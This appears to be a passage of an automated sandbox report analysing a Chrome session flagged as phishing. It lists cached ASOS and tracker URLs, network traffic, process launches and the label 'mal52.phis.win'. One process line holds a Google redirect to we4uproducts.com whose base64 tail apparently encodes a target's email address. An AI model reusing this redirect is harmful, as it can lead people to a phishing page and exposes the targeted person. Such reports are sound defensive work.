Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/vendors.7066a9f385c04a3ae6f5.css
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/vendors.d80e45b3529c947b8d3f.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/storesa/images/flags/gb.png
Source: chromecache_230.1.dr, chromecache_228.1.drString found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://cdn-assets-prod.s3.amazonaws.com/js/preview2/19181552552.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://cdn.optimizely.com
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://ci.asosservices.com
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://ci.asosservices.com/core/shared-libs-4.0.15.min.js
Source: chromecache_230.1.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: chromecache_169.1.drString found in binary or memory: https://content.asos-media.com/-/media/homepages/unisex/generic-hp/june-2024/brand-cat-trays/mw/2024
Source: chromecache_169.1.drString found in binary or memory: https://content.asos-media.com/-/media/homepages/unisex/generic-hp/june-2024/brand-cat-trays/ww/2024
Source: chromecache_169.1.drString found in binary or memory: https://content.asos-media.com/-/media/homepages/unisex/generic-hp/june-2024/eng-speaking/propositio
Source: chromecache_169.1.drString found in binary or memory: https://content.asos-media.com/-/media/homepages/unisex/generic-hp/june-2024/eng-speaking/titles/202
Source: chromecache_169.1.drString found in binary or memory: https://content.asos-media.com/-/media/homepages/unisex/generic-hp/oct-2024/07/cold-weather_generic-
Source: chromecache_169.1.drString found in binary or memory: https://content.asos-media.com/-/media/images/asos/logo/icon_svg.svg
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://creativeassets.asosservices.com/js/cx-nrelic.js
Source: chromecache_186.1.dr, chromecache_203.1.drString found in binary or memory: https://github.com/uuidjs/uuid#getrandomvalues-not-supported
Source: chromecache_228.1.drString found in binary or memory: https://google.com
Source: chromecache_228.1.drString found in binary or memory: https://googleads.g.doubleclick.net
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://images.asos-media.com
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://my.asos.com
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://my.asos.com/identity/register?ctaref=hp
Source: chromecache_228.1.drString found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_230.1.dr, chromecache_228.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://s.go-mpulse.net/boomerang/
Source: chromecache_230.1.drString found in binary or memory: https://s.pinimg.com/ct/core.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://s2.go-mpulse.net/boomerang/
Source: chromecache_230.1.drString found in binary or memory: https://sc-static.net/scevent.min.js
Source: chromecache_169.1.drString found in binary or memory: https://secure.asos.com/
Source: chromecache_225.1.drString found in binary or memory: https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015
Source: chromecache_230.1.dr, chromecache_228.1.drString found in binary or memory: https://td.doubleclick.net
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://twitter.com/ASOS
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://uk.pinterest.com/asos/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com
Source: chromecache_169.1.drString found in binary or memory: https://www.asos.com/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/accessibility/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/assets/uilib/content-ui-library-5.0.0-d7a4d03f-39.css
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/assets/uilib/content-ui-library-5.0.0-d7a4d03f-39.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/au/
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.com/customer-care/product-stock/how-are-products-ranked-on-asos/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/de/
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/de/entdecken/impressum/
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.com/de/kundenservice/produkte-bestand/wie-werden-artikel-auf-asos-aufgelistet/
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/discover/asos-details/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/discover/our-apps/?ctaref=hp
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/dk/
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.com/dk/kundeservice/produkt-lager/hvordan-er-produkter-rangeret-hos-asos/
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/dk/udforsk/asos-details/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/es/
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.com/es/atencion-al-cliente/producto-stock/como-estan-ordenados-los-productos-en-aso
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/es/descubre/asos-details/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/fr/
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/fr/decouvrez/asos-details/
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.com/fr/service-client/produits-stocks/comment-les-produits-sontils-class
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/it/
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.com/it/assistenza-clienti/prodotti-disponibilita/come-vengono-classificati-i-prodot
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/it/scopri/asos-details/
Source: chromecache_169.1.drString found in binary or memory: https://www.asos.com/men/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/men/sale/ctas/price-point-2/cat/?cid=51241#nlid=mw
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/men/sale/ctas/price-point-3/cat/?cid=51242#nlid=mw
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/men/sale/ctas/price-point-4/cat/?cid=51243#nlid=mw
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/nl/
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.com/nl/klantenservice/artikelen-voorraad/hoe-worden-artikelen-gerangschikt-op-asos/
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/nl/ontdek/asos-details/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/payments-and-deliveries/premier-delivery/?ctaref=hp
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/payments-and-deliveries/returns/?country=gb&amp;ctaref=hp
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/pl/
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/pl/odkryj/asos-details/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/privacy-policy/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/se/
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.com/se/kundservice/varor-lagerstatus/hur-rankas-produkterna-pa-asos/
Source: chromecache_162.1.dr, chromecache_130.1.drString found in binary or memory: https://www.asos.com/se/upptack/asos-details/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/search/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/terms-and-conditions/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/us/
Source: chromecache_169.1.drString found in binary or memory: https://www.asos.com/women/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/women/sale/ctas/price-point-2/cat/?cid=51237#nlid=ww
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/women/sale/ctas/price-point-3/cat/?cid=51238#nlid=ww
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.asos.com/women/sale/ctas/price-point-4/cat/?cid=51239#nlid=ww
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.jp/ja-jp/?utm_source=https://asos.com&utm_medium=redirect&ctaref=globalbanner
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://www.asos.kr/ko-kr/?utm_source=https://asos.com&utm_medium=redirect&ctaref=globalbanner
Source: chromecache_228.1.drString found in binary or memory: https://www.google.com
Source: chromecache_228.1.drString found in binary or memory: https://www.googleadservices.com
Source: chromecache_228.1.drString found in binary or memory: https://www.googletagmanager.com
Source: chromecache_230.1.dr, chromecache_228.1.drString found in binary or memory: https://www.googletagmanager.com/a?
Source: chromecache_228.1.drString found in binary or memory: https://www.googletagmanager.com/dclk/ns/v1.js
Source: chromecache_230.1.dr, chromecache_228.1.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.instagram.com/asos/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.snapchat.com/add/asosfashion
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.tiktok.com/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://www.youtube.com/asos
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.win@31/183@130/35
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1964,i,9108029125192006270,4692683740069077808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1964,i,9108029125192006270,4692683740069077808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20="Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
